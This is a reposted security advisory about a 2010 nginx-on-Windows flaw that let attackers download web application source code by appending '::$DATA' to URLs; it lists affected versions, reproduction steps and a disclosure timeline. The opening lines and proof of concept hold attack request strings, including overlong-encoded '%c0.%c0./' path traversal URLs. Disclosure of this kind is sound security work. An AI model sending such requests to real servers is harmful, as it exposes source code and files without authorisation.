分享程序员开发的那些事...
更新时间:2022-09-20 23:27:06
http://www.example.com/index.html::$DATA
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%20
======TESTED VERSIONS=====
Unix versions are not vulnerable (it only affects to NTFS file system)
Windows Stable versions:
nginx/0.7.66 --> Not vulnerable
nginx/0.7.65 --> Vulnerable
nginx/0.7.64 --> Vulnerable
nginx/0.7.63 --> Vulnerable
nginx/0.7.62 --> Vulnerable
nginx/0.7.61 --> Vulnerable
nginx/0.7.60 --> Vulnerable
nginx/0.7.59 --> Vulnerable
nginx/0.7.58 --> Vulnerable
nginx/0.7.56 --> Vulnerable
Windows Development versions:
nginx/0.8.40 --> Not vulnerable
nginx/0.8.39 --> Vulnerable
nginx/0.8.38 --> Vulnerable
nginx/0.8.37 --> Vulnerable
nginx/0.8.36 --> Vulnerable
nginx/0.8.35 --> Vulnerable
nginx/0.8.34 --> Vulnerable
nginx/0.8.33 --> Vulnerable
nginx/0.8.32 --> Vulnerable
nginx/0.8.31 --> Vulnerable
nginx/0.8.30 --> Vulnerable
======DESCRIPTION======
This application was vulnerable to source code disclosure/download vulnerability when
it was running in Windows OS (NTFS file system).
App parser couldn't handle ADS (Alternate Data Streams) and it treated a data stream as an
usual file. An Attacker could read/download source code of webapps files using default data
stream (unnamed): "filename::$data".
This issue is like an old security issue in Microsoft Windows IIS [ref-2].
======PROOF OF CONCEPT======
http://[IP]/[FILE]::$data
======STEPS TO REPRODUCE======
1.- Start the server.
2.- Go to http://127.0.0.1/index.html::$data
3.- Browser requests to download...yes...go to file and open it.
======REFERENCES======
[ref-1] -> http://nginx.org/
[ref-2] -> http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx
======DISCLOSURE TIMELINE======
Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)
[2010-06-04] => Inicial contact with vendor and sent advisory.
[2010-06-04] => Vendor response and believe that vulnerability got fixed with previous release.
[2010-06-04] => I confirm that nginx is vulnerable in Windows 7 OS.
[2010-06-04] => Vendor will try to see the issue.
[2010-06-04] => Vendor confirms the issue and he will get fixed on Monday.
[2010-06-07] => New releases out.
[2010-06-07] => I sent complete advisory and propose as disclosure date on Wednesday.
[2010-06-10] => Second chance to confirm public disclosure.
[2010-06-10] => Vendor is agree.
[2010-06-11] => Forced to public disclosure.
======CREDITS=======
Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/
Thanks to Ruben Santamarta (@reversemode) and Jose María Alonso (@maligno) for their support in other issues.